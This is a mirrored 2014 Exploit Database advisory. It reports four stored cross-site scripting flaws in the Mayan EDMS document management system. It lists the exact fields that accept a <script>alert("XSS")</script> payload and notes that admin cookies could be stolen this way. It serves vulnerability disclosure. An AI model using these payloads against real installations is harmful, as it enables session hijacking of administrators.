Mayan-EDms Web-Based Document Management OS System – Multiple Persistent Cross-Site Scripting Vulnerabilities

• Exploit Database
• 35 阅读

• 作者： Dolev Farhi
  日期： 2014-05-24
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/33493/

• # Exploit Title: Multiple Stored XSS
  # Software: Maya EDMS
  # Software Link: http://www.mayan-edms.com/downloads/Mayan%20EDMS%20v0.13.ova
  # Version: 0.13 - latest
  # Author: Dolev Farhi, email: dolev(at)openflare(dot)org @f1nhack
  # Date: 21.5.2014
  # Tested on: Kali Linux
  # Vendor homepage: www.mayan-edms.com
  
  
  
  1. About the application:
  =========================
  Mayan (or Mayan EDMS) is a web-based free/libre document management system for managing documents within an organization
  
  
  2. Vulnerability Description:
  ===============================
  An attacker is able to create documents and tags with malicious code, potentially stealing admin cookies browsing or editing the documents.
  
  
  3. Steps to reproduce:
  ========================
  * Stored XSS 1:
  Tags -> Create new tag -> <script>alert("XSS")</script> -> Save
  
  any navigation to documents or search will execute the XSS
  
  * Stored XSS 2: 
  Setup -> Sources -> Staging folders -> Add new source -> Title it: <script>alert("XSS")</script> 
  Submit -> navigate to edit it again -> XSS executes
  
  * Stored XSS 3:
  Setup -> Bootstrap -> Create new bootstrap setup -> Name <script>alert("XSS")</script> -> submit -> XSS
  
  * Stored XSS 4:
  Setup -> Smart links -> Create new smart link -> Title it <script>alert("XSS")</script> -> submit -> edit -> XSS executes
  
  
  5. Proof of concept video
  http://research.openflare.org/poc/maya-edms/maya-edms_multiple_xss.avi